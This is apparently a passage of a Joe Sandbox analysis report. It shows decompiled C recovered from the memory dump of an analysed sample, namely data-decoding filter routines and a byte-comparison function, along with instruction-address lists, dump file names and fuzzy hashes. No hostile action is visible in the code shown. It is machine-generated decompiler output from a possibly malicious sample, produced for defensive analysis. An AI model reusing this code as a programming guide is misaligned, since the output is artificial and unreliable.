						_t317 = _t205 & 0x000000ff;
						 *(_t355 + 0x34) = 0;
						 *(_t355 + 0x40) = _t317;
						_t350 = 0x12;
						do {
							if((_t317 & 1) != 0) {
								_t175 = _t350 + 0x18; // 0x2a
								if(E0006C37C(_t277, _t175, 4) == 5) {
									E0006C3C7(_t277, E0006C37C(_t277, _t350, 0x14) - _t332 & 0x000fffff, _t350, 0x14);
								}
								_t317 =  *(_t355 + 0x3c);
								_t285 =  *(_t355 + 0x30);
							}
							_t285 = _t285 + 1;
							_t350 = _t350 + 0x29;
							 *(_t355 + 0x30) = _t285;
						} while (_t350 <= 0x64);
						_t331 =  *(_t355 + 0x38);
						_t316 =  *(_t355 + 0x2c);
						L84:
						_t277 =  &(_t277[0x10]);
						_t316 = _t316 + 1;
						_t331 = _t331 - 1;
						 *(_t355 + 0x2c) = _t316;
						 *(_t355 + 0x38) = _t331;
					} while (_t331 != 0);
					goto L15;
				}
				if(_t311 == 4) {
					_t215 = __ecx[1];
					_t289 = __ecx[5];
					_t333 = __ecx[2];
					 *(_t355 + 0x20) = _t215;
					_t278 = _t215 - 3;
					 *(_t355 + 0x30) = _t289;
					 *(_t355 + 0x3c) = _t278;
					 *(_t355 + 0x44) = _t333;
					if(_t289 - 3 > 0x1fffd || _t278 > _t289 || _t333 > 2) {
						goto L98;
					} else {
						_t217 =  *__ecx;
						 *(_t355 + 0x2c) = _t217;
						_t351 = _t217 + _t289;
						_t218 = 0;
						 *(_t355 + 0x18) = _t351;
						_t319 = _t351 - _t278;
						 *(_t355 + 0x24) = 0;
						 *(_t355 + 0x14) = _t319;
						do {
							_t279 = 0;
							if(_t218 >= _t289) {
								goto L67;
							}
							_t334 = _t319 + _t218;
							_t320 =  *(_t355 + 0x20);
							_t221 =  *(_t355 + 0x3c) - _t351;
							_t352 =  *(_t355 + 0x3c);
							 *(_t355 + 0x28) = _t221;
							do {
								if( &(_t334[_t221]) >= _t320) {
									_t227 =  *_t334 & 0x000000ff;
									_t291 =  *(_t334 - 3) & 0x000000ff;
									 *(_t355 + 0x38) =  *_t334 & 0x000000ff;
									 *(_t355 + 0x34) =  *(_t334 - 3) & 0x000000ff;
									 *(_t355 + 0x44) = E000858CA(_t320, _t227 - _t291 + _t279 - _t279);
									 *(_t355 + 0x28) = E000858CA(_t320, _t227 - _t291 + _t279 -  *(_t355 + 0x3c));
									_t234 = E000858CA(_t320, _t227 - _t291 + _t279 -  *(_t355 + 0x3c));
									_t292 =  *((intOrPtr*)(_t355 + 0x4c));
									_t355 = _t355 + 0xc;
									_t321 =  *(_t355 + 0x1c);
									if(_t292 > _t321 || _t292 > _t234) {
										_t289 =  *(_t355 + 0x30);
										_t320 =  *(_t355 + 0x20);
										_t279 =  *(_t355 + 0x38);
										if(_t321 > _t234) {
											_t279 =  *(_t355 + 0x34);
										}
									} else {
										_t289 =  *(_t355 + 0x30);
										_t320 =  *(_t355 + 0x20);
									}
								}
								_t223 =  *(_t355 + 0x2c);
								_t279 = _t279 -  *_t223 & 0x000000ff;
								 *(_t355 + 0x2c) = _t223 + 1;
								_t334[_t352] = _t279;
								_t334 =  &(_t334[3]);
								_t221 =  *(_t355 + 0x28);
							} while ( &(_t334[ *(_t355 + 0x28)]) < _t289);
							_t351 =  *(_t355 + 0x18);
							_t218 =  *(_t355 + 0x24);
							_t319 =  *(_t355 + 0x14);
							L67:
							_t218 = _t218 + 1;
							 *(_t355 + 0x24) = _t218;
						} while (_t218 < 3);
						_t335 =  *(_t355 + 0x44);
						_t290 = _t289 + 0xfffffffe;
						while(_t335 < _t290) {
							_t219 =  *((intOrPtr*)(_t335 + _t351 + 1));
							 *((intOrPtr*)(_t335 + _t351)) =  *((intOrPtr*)(_t335 + _t351)) + _t219;
							 *((intOrPtr*)(_t335 + _t351 + 2)) =  *((intOrPtr*)(_t335 + _t351 + 2)) + _t219;
							_t335 = _t335 + 3;
						}
						goto L15;
					}
				}
				if(_t311 == 5) {
					_t235 = __ecx[5];
					_t293 =  *__ecx;
					_t281 = __ecx[1];
					 *(_t355 + 0x34) = _t293;
					 *(_t355 + 0x38) = _t235;
					 *(_t355 + 0x40) = _t293 + _t235;
					if(_t235 > 0x20000 || _t281 > 0x80 || _t281 == 0) {
						goto L98;
					} else {
						_t336 = 0;
						 *(_t355 + 0x3c) = 0;
						if(_t281 == 0) {
							goto L15;
						} else {
							goto L21;
						}
						do {
							L21:
							 *(_t355 + 0x28) =  *(_t355 + 0x28) & 0x00000000;
							 *(_t355 + 0x24) =  *(_t355 + 0x24) & 0x00000000;
							_t345 = 0;
							 *(_t355 + 0x20) =  *(_t355 + 0x20) & 0x00000000;
							_t353 = 0;
							 *(_t355 + 0x1c) =  *(_t355 + 0x1c) & 0x00000000;
							 *(_t355 + 0x14) =  *(_t355 + 0x14) & 0;
							 *(_t355 + 0x24) = 0;
							E0007F350(_t336, _t355 + 0x48, 0, 0x1c);
							 *(_t355 + 0x3c) =  *(_t355 + 0x3c) & 0;
							_t355 = _t355 + 0xc;
							 *(_t355 + 0x2c) = _t336;
							if(_t336 <  *(_t355 + 0x38)) {
								_t238 =  *(_t355 + 0x14);
								do {
									_t322 =  *(_t355 + 0x24);
									 *(_t355 + 0x1c) = _t322 -  *(_t355 + 0x20);
									_t297 =  *(_t355 + 0x34);
									 *(_t355 + 0x20) = _t322;
									_t323 =  *_t297 & 0x000000ff;
									 *(_t355 + 0x34) =  &(_t297[1]);
									_t304 = ( *(_t355 + 0x1c) * _t238 + _t345 *  *(_t355 + 0x1c) + _t353 *  *(_t355 + 0x24) +  *(_t355 + 0x28) * 0x00000008 >> 0x00000003 & 0x000000ff) - _t323;
									 *( *(_t355 + 0x2c) +  *(_t355 + 0x40)) = _t304;
									_t349 = _t323 << 3;
									 *(_t355 + 0x28) = _t304 -  *(_t355 + 0x28);
									 *(_t355 + 0x2c) = _t304;
									 *((intOrPtr*)(_t355 + 0x4c)) =  *((intOrPtr*)(_t355 + 0x4c)) + E000858CA(_t323, _t323 << 3);
									 *((intOrPtr*)(_t355 + 0x54)) =  *((intOrPtr*)(_t355 + 0x54)) + E000858CA(_t323, (_t323 << 3) -  *(_t355 + 0x24));
									 *((intOrPtr*)(_t355 + 0x5c)) =  *((intOrPtr*)(_t355 + 0x5c)) + E000858CA(_t323,  *(_t355 + 0x28) + (_t323 << 3));
									 *((intOrPtr*)(_t355 + 0x64)) =  *((intOrPtr*)(_t355 + 0x64)) + E000858CA(_t323, (_t323 << 3) -  *(_t355 + 0x28));
									 *((intOrPtr*)(_t355 + 0x6c)) =  *((intOrPtr*)(_t355 + 0x6c)) + E000858CA(_t323,  *(_t355 + 0x2c) + _t349);
									 *((intOrPtr*)(_t355 + 0x74)) =  *((intOrPtr*)(_t355 + 0x74)) + E000858CA(_t323, _t349 -  *(_t355 + 0x1c));
									 *((intOrPtr*)(_t355 + 0x7c)) =  *((intOrPtr*)(_t355 + 0x7c)) + E000858CA(_t323, _t349 +  *(_t355 + 0x1c));
									_t355 = _t355 + 0x1c;
									if(( *(_t355 + 0x30) & 0x0000001f) != 0) {
										_t345 =  *(_t355 + 0x18);
										_t238 =  *(_t355 + 0x14);
									} else {
										_t324 =  *(_t355 + 0x48);
										_t266 = 0;
										 *(_t355 + 0x48) =  *(_t355 + 0x48) & 0;
										_t308 = 1;
										do {
											if( *(_t355 + 0x48 + _t308 * 4) < _t324) {
												_t324 =  *(_t355 + 0x48 + _t308 * 4);
												_t266 = _t308;
											}
											 *(_t355 + 0x48 + _t308 * 4) =  *(_t355 + 0x48 + _t308 * 4) & 0x00000000;
											_t308 = _t308 + 1;
										} while (_t308 < 7);
										_t345 =  *(_t355 + 0x18);
										_t267 = _t266 - 1;
										if(_t267 == 0) {
											_t238 =  *(_t355 + 0x14);
											if(_t353 >= 0xfffffff0) {
												_t353 = _t353 - 1;
											}
											goto L49;
										}
										_t268 = _t267 - 1;
										if(_t268 == 0) {
											_t238 =  *(_t355 + 0x14);
											if(_t353 < 0x10) {
												_t353 = _t353 + 1;
											}
											goto L49;
										}
										_t269 = _t268 - 1;
										if(_t269 == 0) {
											_t238 =  *(_t355 + 0x14);
											if(_t345 < 0xfffffff0) {
												goto L49;
											}
											_t345 = _t345 - 1;
											L43:
											 *(_t355 + 0x18) = _t345;
											goto L49;
										}
										_t270 = _t269 - 1;
										if(_t270 == 0) {
											_t238 =  *(_t355 + 0x14);
											if(_t345 >= 0x10) {
												goto L49;
											}
											_t345 = _t345 + 1;
											goto L43;
										}
										_t271 = _t270 - 1;
										if(_t271 == 0) {
											_t238 =  *(_t355 + 0x14);
											if(_t238 < 0xfffffff0) {
												goto L49;
											}
											_t238 = _t238 - 1;
											L36:
											 *(_t355 + 0x14) = _t238;
											goto L49;
										}
										_t238 =  *(_t355 + 0x14);
										if(_t271 != 1 || _t238 >= 0x10) {
											goto L49;
										} else {
											_t238 = _t238 + 1;
											goto L36;
										}
									}
									L49:
									_t306 =  *(_t355 + 0x2c) + _t281;
									 *(_t355 + 0x30) =  *(_t355 + 0x30) + 1;
									 *(_t355 + 0x2c) = _t306;
								} while (_t306 <  *(_t355 + 0x38));
								_t336 =  *(_t355 + 0x3c);
							}
							_t336 = _t336 + 1;
							 *(_t355 + 0x3c) = _t336;
						} while (_t336 < _t281);
						goto L15;
					}
				}
				if(_t311 != 6) {
					goto L15;
				}
				_t309 = __ecx[5];
				_t354 = 0;
				_t325 = __ecx[1];
				 *(_t355 + 0x2c) = _t309;
				 *(_t355 + 0x30) = _t309 + _t309;
				if(_t309 > 0x20000 || _t325 > 0x400 || _t325 == 0) {
					goto L98;
				} else {
					_t274 = _t325;
					 *(_t355 + 0x28) = _t325;
					do {
						_t282 = 0;
						_t338 = _t309;
						if(_t309 <  *(_t355 + 0x30)) {
							_t310 =  *(_t355 + 0x30);
							goto L12;
							L12:
							_t275 =  *_t339;
							_t282 = _t282 -  *((intOrPtr*)(_t275 + _t354));
							_t354 = _t354 + 1;
							 *((char*)(_t275 + _t338)) = _t282;
							_t338 = _t338 + _t325;
							if(_t338 < _t310) {
								goto L12;
							} else {
								_t309 =  *(_t355 + 0x2c);
								_t274 =  *(_t355 + 0x28);
								goto L14;
							}
						}
						L14:
						_t309 = _t309 + 1;
						_t274 = _t274 - 1;
						 *(_t355 + 0x2c) = _t309;
						 *(_t355 + 0x28) = _t274;
					} while (_t274 != 0);
					goto L15;
				}
			}

0x0006be13
0x0006be1d
0x0006be22
0x0006beb9
0x00000000
0x0006beb9
0x0006be2b
0x0006c303
0x0006c306
0x0006c308
0x0006c30b
0x0006c314
0x0006c375
0x00000000
0x0006c375
0x0006c31c
0x0006c31e
0x0006c320
0x0006c326
0x00000000
0x00000000
0x00000000
0x00000000
0x0006c32c
0x0006c32c
0x0006c32c
0x0006c32e
0x0006c32f
0x0006c330
0x0006c334
0x0006c33a
0x0006c33e
0x0006c351
0x0006c359
0x0006c35d
0x0006c35d
0x0006c340
0x0006c345
0x0006c347
0x0006c34d
0x0006c34d
0x0006c345
0x0006c35f
0x0006c363
0x0006c366
0x0006c369
0x0006c369
0x0006c36c
0x00000000
0x0006c370
0x0006be34
0x0006c23d
0x0006c23f
0x0006c248
0x00000000
0x00000000
0x0006c251
0x0006c254
0x0006c25a
0x00000000
0x00000000
0x0006c264
0x0006c265
0x0006c269
0x0006c26f
0x0006c272
0x00000000
0x00000000
0x0006c274
0x0006c27c
0x00000000
0x00000000
0x0006c27e
0x0006c282
0x0006c284
0x0006c289
0x0006c28d
0x0006c291
0x0006c292
0x0006c299
0x0006c29d
0x0006c2ac
0x0006c2c7
0x0006c2c7
0x0006c2cc
0x0006c2d0
0x0006c2d0
0x0006c2d4
0x0006c2d5
0x0006c2d8
0x0006c2dc
0x0006c2e1
0x0006c2e5
0x0006c2e9
0x0006c2e9
0x0006c2ec
0x0006c2ed
0x0006c2f0
0x0006c2f4
0x0006c2f4
0x00000000
0x0006c2fe
0x0006be3d
0x0006c0f1
0x0006c0f4
0x0006c0f7
0x0006c0fa
0x0006c0fe
0x0006c101
0x0006c108
0x0006c10c
0x0006c115
0x00000000
0x0006c12c
0x0006c12c
0x0006c12e
0x0006c132
0x0006c135
0x0006c139
0x0006c13d
0x0006c13f
0x0006c143
0x0006c147
0x0006c147
0x0006c14b
0x00000000
0x00000000
0x0006c151
0x0006c158
0x0006c15c
0x0006c15e
0x0006c162
0x0006c166
0x0006c16a
0x0006c16c
0x0006c16f
0x0006c177
0x0006c17d
0x0006c18b
0x0006c1a0
0x0006c1a4
0x0006c1a9
0x0006c1ad
0x0006c1b0
0x0006c1b6
0x0006c1c6
0x0006c1cc
0x0006c1d0
0x0006c1d4
0x0006c1d6
0x0006c1d6
0x0006c1bc
0x0006c1bc
0x0006c1c0
0x0006c1c0
0x0006c1b6
0x0006c1da
0x0006c1e1
0x0006c1e4
0x0006c1ec
0x0006c1ef
0x0006c1f6
0x0006c1f6
0x0006c200
0x0006c204
0x0006c208
0x0006c20c
0x0006c20c
0x0006c20d
0x0006c211
0x0006c21a
0x0006c21e
0x0006c231
0x0006c223
0x0006c227
0x0006c22a
0x0006c22e
0x0006c22e
0x00000000
0x0006c235
0x0006c115
0x0006be46
0x0006bec5
0x0006bec8
0x0006beca
0x0006becd
0x0006bed3
0x0006bed7
0x0006bee0
0x00000000
0x0006befa
0x0006befa
0x0006befc
0x0006bf02
0x00000000
0x00000000
0x00000000
0x00000000
0x0006bf04
0x0006bf04
0x0006bf04
0x0006bf0d
0x0006bf12
0x0006bf14
0x0006bf19
0x0006bf1b
0x0006bf20
0x0006bf28
0x0006bf2c
0x0006bf31
0x0006bf35
0x0006bf38
0x0006bf40
0x0006bf46
0x0006bf4a
0x0006bf4a
0x0006bf58
0x0006bf5c
0x0006bf65
0x0006bf69
0x0006bf6d
0x0006bf96
0x0006bf98
0x0006bfa7
0x0006bfab
0x0006bfaf
0x0006bfb8
0x0006bfc8
0x0006bfd8
0x0006bfe8
0x0006bff8
0x0006c006
0x0006c013
0x0006c017
0x0006c01f
0x0006c0bb
0x0006c0bf
0x0006c025
0x0006c025
0x0006c029
0x0006c02b
0x0006c031
0x0006c032
0x0006c036
0x0006c038
0x0006c03c
0x0006c03c
0x0006c03e
0x0006c043
0x0006c044
0x0006c049
0x0006c04d
0x0006c050
0x0006c0af
0x0006c0b6
0x0006c0b8
0x0006c0b8
0x00000000
0x0006c0b6
0x0006c052
0x0006c055
0x0006c0a3
0x0006c0aa
0x0006c0ac
0x0006c0ac
0x00000000
0x0006c0aa
0x0006c057
0x0006c05a
0x0006c093
0x0006c09a
0x00000000
0x00000000
0x0006c09c
0x0006c09d
0x0006c09d
0x00000000
0x0006c09d
0x0006c05c
0x0006c05f
0x0006c087
0x0006c08e
0x00000000
0x00000000
0x0006c090
0x00000000
0x0006c090
0x0006c061
0x0006c064
0x0006c07b
0x0006c082
0x00000000
0x00000000
0x0006c084
0x0006c075
0x0006c075
0x00000000
0x0006c075
0x0006c069
0x0006c06d
0x00000000
0x0006c074
0x0006c074
0x00000000
0x0006c074
0x0006c06d
0x0006c0c3
0x0006c0c7
0x0006c0c9
0x0006c0cd
0x0006c0d1
0x0006c0db
0x0006c0db
0x0006c0df
0x0006c0e0
0x0006c0e4
0x00000000
0x0006c0ec
0x0006bee0
0x0006be4b
0x00000000
0x00000000
0x0006be4d
0x0006be50
0x0006be52
0x0006be55
0x0006be5c
0x0006be66
0x00000000
0x0006be80
0x0006be80
0x0006be82
0x0006be86
0x0006be86
0x0006be88
0x0006be8e
0x0006be90
0x0006be90
0x0006be94
0x0006be94
0x0006be96
0x0006be99
0x0006be9a
0x0006be9d
0x0006bea1
0x00000000
0x0006bea3
0x0006bea3
0x0006bea7
0x00000000
0x0006bea7
0x0006bea1
0x0006beab
0x0006beab
0x0006beac
0x0006beaf
0x0006beb3
0x0006beb3
0x00000000
0x0006be86

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5abfad06a09d8ac820698f23492092ea338ac8270220aa1f498bd8ff1da96b20
Instruction ID: a55aa5d5b033f1e63bd1fede8db8186e7114ddb7dc84d6121be872c7864df4bc
Opcode Fuzzy Hash: 5abfad06a09d8ac820698f23492092ea338ac8270220aa1f498bd8ff1da96b20
Instruction Fuzzy Hash: 25F198B16083118FE758CF29C48496EBBE2EFC9314F148A2EF4D597352D731E9458B52

Uniqueness

Uniqueness Score: -1.00%

Function 00080B43 Relevance: .3, Instructions: 345
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00080B43(void* __edx, void* __esi) {
				signed int _t192;
				signed char _t193;
				signed char _t194;
				signed char _t195;
				signed char _t196;
				signed char _t198;
				signed int _t241;
				void* _t287;
				void* _t292;
				void* _t294;
				void* _t296;
				void* _t298;
				void* _t300;
				void* _t302;
				void* _t304;
				void* _t306;
				void* _t308;
				void* _t310;
				void* _t312;
				void* _t314;
				void* _t316;
				void* _t318;
				void* _t320;
				void* _t322;
				void* _t324;
				void* _t326;
				void* _t327;

				_t327 = __esi;
				_t287 = __edx;
				if( *((intOrPtr*)(__esi - 0x1e)) ==  *((intOrPtr*)(__edx - 0x1e))) {
					_t241 = 0;
					L15:
					if(_t241 != 0) {
						goto L2;
					}
					_t193 =  *(_t327 - 0x1a);
					if(_t193 ==  *(_t287 - 0x1a)) {
						_t241 = 0;
						L26:
						if(_t241 != 0) {
							goto L2;
						}
						_t194 =  *(_t327 - 0x16);
						if(_t194 ==  *(_t287 - 0x16)) {
							_t241 = 0;
							L37:
							if(_t241 != 0) {
								goto L2;
							}
							_t195 =  *(_t327 - 0x12);
							if(_t195 ==  *(_t287 - 0x12)) {
								_t241 = 0;
								L48:
								if(_t241 != 0) {
									goto L2;
								}
								_t196 =  *(_t327 - 0xe);
								if(_t196 ==  *(_t287 - 0xe)) {
									_t241 = 0;
									L59:
									if(_t241 != 0) {
										goto L2;
									}
									if( *(_t327 - 0xa) ==  *(_t287 - 0xa)) {
										_t241 = 0;
										L70:
										if(_t241 != 0) {
											goto L2;
										}
										_t198 =  *(_t327 - 6);
										if(_t198 ==  *(_t287 - 6)) {
											_t241 = 0;
											L81:
											if(_t241 == 0 &&  *((intOrPtr*)(_t327 - 2)) ==  *((intOrPtr*)(_t287 - 2))) {
											}
											goto L2;
										}
										_t292 = (_t198 & 0x000000ff) - ( *(_t287 - 6) & 0x000000ff);
										if(_t292 == 0) {
											L74:
											_t294 = ( *(_t327 - 5) & 0x000000ff) - ( *(_t287 - 5) & 0x000000ff);
											if(_t294 == 0) {
												L76:
												_t296 = ( *(_t327 - 4) & 0x000000ff) - ( *(_t287 - 4) & 0x000000ff);
												if(_t296 == 0) {
													L78:
													_t241 = ( *(_t327 - 3) & 0x000000ff) - ( *(_t287 - 3) & 0x000000ff);
													if(_t241 != 0) {
														_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
													}
													goto L81;
												}
												_t241 = (0 | _t296 > 0x00000000) * 2 - 1;
												if(_t241 != 0) {
													goto L2;
												}
												goto L78;
											}
											_t241 = (0 | _t294 > 0x00000000) * 2 - 1;
											if(_t241 != 0) {
												goto L2;
											}
											goto L76;
										}
										_t241 = (0 | _t292 > 0x00000000) * 2 - 1;
										if(_t241 != 0) {
											goto L2;
										}
										goto L74;
									}
									_t298 = ( *(_t327 - 0xa) & 0x000000ff) - ( *(_t287 - 0xa) & 0x000000ff);
									if(_t298 == 0) {
										L63:
										_t300 = ( *(_t327 - 9) & 0x000000ff) - ( *(_t287 - 9) & 0x000000ff);
										if(_t300 == 0) {
											L65:
											_t302 = ( *(_t327 - 8) & 0x000000ff) - ( *(_t287 - 8) & 0x000000ff);
											if(_t302 == 0) {
												L67:
												_t241 = ( *(_t327 - 7) & 0x000000ff) - ( *(_t287 - 7) & 0x000000ff);
												if(_t241 != 0) {
													_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
												}
												goto L70;
											}
											_t241 = (0 | _t302 > 0x00000000) * 2 - 1;
											if(_t241 != 0) {
												goto L2;
											}
											goto L67;
										}
										_t241 = (0 | _t300 > 0x00000000) * 2 - 1;
										if(_t241 != 0) {
											goto L2;
										}
										goto L65;
									}
									_t241 = (0 | _t298 > 0x00000000) * 2 - 1;
									if(_t241 != 0) {
										goto L2;
									}
									goto L63;
								}
								_t304 = (_t196 & 0x000000ff) - ( *(_t287 - 0xe) & 0x000000ff);
								if(_t304 == 0) {
									L52:
									_t306 = ( *(_t327 - 0xd) & 0x000000ff) - ( *(_t287 - 0xd) & 0x000000ff);
									if(_t306 == 0) {
										L54:
										_t308 = ( *(_t327 - 0xc) & 0x000000ff) - ( *(_t287 - 0xc) & 0x000000ff);
										if(_t308 == 0) {
											L56:
											_t241 = ( *(_t327 - 0xb) & 0x000000ff) - ( *(_t287 - 0xb) & 0x000000ff);
											if(_t241 != 0) {
												_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
											}
											goto L59;
										}
										_t241 = (0 | _t308 > 0x00000000) * 2 - 1;
										if(_t241 != 0) {
											goto L2;
										}
										goto L56;
									}
									_t241 = (0 | _t306 > 0x00000000) * 2 - 1;
									if(_t241 != 0) {
										goto L2;
									}
									goto L54;
								}
								_t241 = (0 | _t304 > 0x00000000) * 2 - 1;
								if(_t241 != 0) {
									goto L2;
								}
								goto L52;
							}
							_t310 = (_t195 & 0x000000ff) - ( *(_t287 - 0x12) & 0x000000ff);
							if(_t310 == 0) {
								L41:
								_t312 = ( *(_t327 - 0x11) & 0x000000ff) - ( *(_t287 - 0x11) & 0x000000ff);
								if(_t312 == 0) {
									L43:
									_t314 = ( *(_t327 - 0x10) & 0x000000ff) - ( *(_t287 - 0x10) & 0x000000ff);
									if(_t314 == 0) {
										L45:
										_t241 = ( *(_t327 - 0xf) & 0x000000ff) - ( *(_t287 - 0xf) & 0x000000ff);
										if(_t241 != 0) {
											_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
										}
										goto L48;
									}
									_t241 = (0 | _t314 > 0x00000000) * 2 - 1;
									if(_t241 != 0) {
										goto L2;
									}
									goto L45;
								}
								_t241 = (0 | _t312 > 0x00000000) * 2 - 1;
								if(_t241 != 0) {
									goto L2;
								}
								goto L43;
							}
							_t241 = (0 | _t310 > 0x00000000) * 2 - 1;
							if(_t241 != 0) {
								goto L2;
							}
							goto L41;
						}
						_t316 = (_t194 & 0x000000ff) - ( *(_t287 - 0x16) & 0x000000ff);
						if(_t316 == 0) {
							L30:
							_t318 = ( *(_t327 - 0x15) & 0x000000ff) - ( *(_t287 - 0x15) & 0x000000ff);
							if(_t318 == 0) {
								L32:
								_t320 = ( *(_t327 - 0x14) & 0x000000ff) - ( *(_t287 - 0x14) & 0x000000ff);
								if(_t320 == 0) {
									L34:
									_t241 = ( *(_t327 - 0x13) & 0x000000ff) - ( *(_t287 - 0x13) & 0x000000ff);
									if(_t241 != 0) {
										_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
									}
									goto L37;
								}
								_t241 = (0 | _t320 > 0x00000000) * 2 - 1;
								if(_t241 != 0) {
									goto L2;
								}
								goto L34;
							}
							_t241 = (0 | _t318 > 0x00000000) * 2 - 1;
							if(_t241 != 0) {
								goto L2;
							}
							goto L32;
						}
						_t241 = (0 | _t316 > 0x00000000) * 2 - 1;
						if(_t241 != 0) {
							goto L2;
						}
						goto L30;
					}
					_t322 = (_t193 & 0x000000ff) - ( *(_t287 - 0x1a) & 0x000000ff);
					if(_t322 == 0) {
						L19:
						_t324 = ( *(_t327 - 0x19) & 0x000000ff) - ( *(_t287 - 0x19) & 0x000000ff);
						if(_t324 == 0) {
							L21:
							_t326 = ( *(_t327 - 0x18) & 0x000000ff) - ( *(_t287 - 0x18) & 0x000000ff);
							if(_t326 == 0) {
								L23:
								_t241 = ( *(_t327 - 0x17) & 0x000000ff) - ( *(_t287 - 0x17) & 0x000000ff);
								if(_t241 != 0) {
									_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
								}
								goto L26;
							}
							_t241 = (0 | _t326 > 0x00000000) * 2 - 1;
							if(_t241 != 0) {
								goto L2;
							}
							goto L23;
						}
						_t241 = (0 | _t324 > 0x00000000) * 2 - 1;
						if(_t241 != 0) {
							goto L2;
						}
						goto L21;
					}
					_t241 = (0 | _t322 > 0x00000000) * 2 - 1;
					if(_t241 != 0) {
						goto L2;
					}
					goto L19;
				} else {
					__edi = __al & 0x000000ff;
					__edi = (__al & 0x000000ff) - ( *(__edx - 0x1e) & 0x000000ff);
					if(__edi == 0) {
						L8:
						__edi =  *(__esi - 0x1d) & 0x000000ff;
						__edi = ( *(__esi - 0x1d) & 0x000000ff) - ( *(__edx - 0x1d) & 0x000000ff);
						if(__edi == 0) {
							L10:
							__edi =  *(__esi - 0x1c) & 0x000000ff;
							__edi = ( *(__esi - 0x1c) & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
							if(__edi == 0) {
								L12:
								__ecx =  *(__esi - 0x1b) & 0x000000ff;
								__ecx = ( *(__esi - 0x1b) & 0x000000ff) - ( *(__edx - 0x1b) & 0x000000ff);
								if(__ecx != 0) {
									__ecx = (0 | __ecx > 0x00000000) * 2 - 1;
								}
								goto L15;
							}
							0 = 0 | __edi > 0x00000000;
							__ecx = (__edi > 0) * 2 != 1;
							if((__edi > 0) * 2 != 1) {
								L2:
								_t192 = _t241;
								return _t192;
							}
							goto L12;
						}
						0 = 0 | __edi > 0x00000000;
						__ecx = (__edi > 0) * 2 != 1;
						if((__edi > 0) * 2 != 1) {
							goto L2;
						}
						goto L10;
					}
					0 = 0 | __edi > 0x00000000;
					__ecx = (__edi > 0) * 2 != 1;
					if((__edi > 0) * 2 != 1) {
						goto L2;
					}
					goto L8;
				}
			}

0x00080b43
0x00080b43
0x00080b49
0x00080bd0
0x00080bd2
0x00080bd4
0x00000000
0x00000000
0x00080bda
0x00080be0
0x00080c67
0x00080c69
0x00080c6b
0x00000000
0x00000000
0x00080c71
0x00080c77
0x00080cfe
0x00080d00
0x00080d02
0x00000000
0x00000000
0x00080d08
0x00080d0e
0x00080d95
0x00080d97
0x00080d99
0x00000000
0x00000000
0x00080d9f
0x00080da5
0x00080e2c
0x00080e2e
0x00080e30
0x00000000
0x00000000
0x00080e3c
0x00080ec4
0x00080ec6
0x00080ec8
0x00000000
0x00000000
0x00080ece
0x00080ed4
0x00080f5b
0x00080f5d
0x00080f5f
0x00080f5f
0x00000000
0x00080f5f
0x00080ee1
0x00080ee3
0x00080efb
0x00080f03
0x00080f05
0x00080f1d
0x00080f25
0x00080f27
0x00080f3f
0x00080f47
0x00080f49
0x00080f52
0x00080f52
0x00000000
0x00080f49
0x00080f30
0x00080f39
0x00000000
0x00000000
0x00000000
0x00080f39
0x00080f0e
0x00080f17
0x00000000
0x00000000
0x00000000
0x00080f17
0x00080eec
0x00080ef5
0x00000000
0x00000000
0x00000000
0x00080ef5
0x00080e4a
0x00080e4c
0x00080e64
0x00080e6c
0x00080e6e
0x00080e86
0x00080e8e
0x00080e90
0x00080ea8
0x00080eb0
0x00080eb2
0x00080ebb
0x00080ebb
0x00000000
0x00080eb2
0x00080e99
0x00080ea2
0x00000000
0x00000000
0x00000000
0x00080ea2
0x00080e77
0x00080e80
0x00000000
0x00000000
0x00000000
0x00080e80
0x00080e55
0x00080e5e
0x00000000
0x00000000
0x00000000
0x00080e5e
0x00080db2
0x00080db4
0x00080dcc
0x00080dd4
0x00080dd6
0x00080dee
0x00080df6
0x00080df8
0x00080e10
0x00080e18
0x00080e1a
0x00080e23
0x00080e23
0x00000000
0x00080e1a
0x00080e01
0x00080e0a
0x00000000
0x00000000
0x00000000
0x00080e0a
0x00080ddf
0x00080de8
0x00000000
0x00000000
0x00000000
0x00080de8
0x00080dbd
0x00080dc6
0x00000000
0x00000000
0x00000000
0x00080dc6
0x00080d1b
0x00080d1d
0x00080d35
0x00080d3d
0x00080d3f
0x00080d57
0x00080d5f
0x00080d61
0x00080d79
0x00080d81
0x00080d83
0x00080d8c
0x00080d8c
0x00000000
0x00080d83
0x00080d6a
0x00080d73
0x00000000
0x00000000
0x00000000
0x00080d73
0x00080d48
0x00080d51
0x00000000
0x00000000
0x00000000
0x00080d51
0x00080d26
0x00080d2f
0x00000000
0x00000000
0x00000000
0x00080d2f
0x00080c84
0x00080c86
0x00080c9e
0x00080ca6
0x00080ca8
0x00080cc0
0x00080cc8
0x00080cca
0x00080ce2
0x00080cea
0x00080cec
0x00080cf5
0x00080cf5
0x00000000
0x00080cec
0x00080cd3
0x00080cdc
0x00000000
0x00000000
0x00000000
0x00080cdc
0x00080cb1
0x00080cba
0x00000000
0x00000000
0x00000000
0x00080cba
0x00080c8f
0x00080c98
0x00000000
0x00000000
0x00000000
0x00080c98
0x00080bed
0x00080bef
0x00080c07
0x00080c0f
0x00080c11
0x00080c29
0x00080c31
0x00080c33
0x00080c4b
0x00080c53
0x00080c55
0x00080c5e
0x00080c5e
0x00000000
0x00080c55
0x00080c3c
0x00080c45
0x00000000
0x00000000
0x00000000
